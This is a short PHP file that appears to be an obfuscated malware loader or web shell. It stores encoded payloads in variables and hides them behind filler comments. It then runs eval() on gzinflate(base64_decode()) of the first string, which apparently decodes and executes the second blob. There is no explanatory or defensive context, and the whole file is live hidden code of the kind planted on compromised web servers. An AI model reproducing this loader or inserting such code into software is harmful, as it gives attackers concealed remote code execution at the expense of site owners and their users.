<?php
/* AAAAAAAAAAAAAAAAAAAAA */
$Cyto = "Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1K\x42rNK85Pz\x63gqLU4mLq\x43\x43\x63lFqe\x61m\x63Snp\x43\x62np6Rq\x41O0sSi3TUPHJrNBE\x41tY\x41";
/* AAAAAAAAAAAAAAAAAAAAA */
$Lix = "7f1YO0LU\x2bHixJNzo2HU9Sux\x2b6\x2b\x63NVvYdtvFe8voRmqJnLPMOYVxFWFR6xQYeS0JeT0ok3i\x43Mv6l1wM\x63Es\x41wvmi4DO8r758\x62/\x2bWu9U\x41Zr6\x42VhJP\x42HDX\x2bXVrY8t\x63xOFROqey\x62ikiH\x62\x42ogQQ0QseW2SnOKDToD3HjpZtS/KLU6rni4EfxIQ\x627XokUiHlW\x623TV/\x41\x42F\x41\x433J49ER\x42MDqQQM22/x\x42gj\x42wJe/\x62G\x41ZGw/h\x42gn\x42wJe/\x62F\x41pGw/R\x42gr\x42wJe/\x62E\x415Gw/\x42\x42gv\x42wJe";
/* AAAAAAAAAAAAAAAAAAAAA */
eval(htmlspecialchars_decode(gzinflate(base64_decode($Cyto))));
/* AAAAAAAAAAAAAAAAAAAAA */
exit;
?>
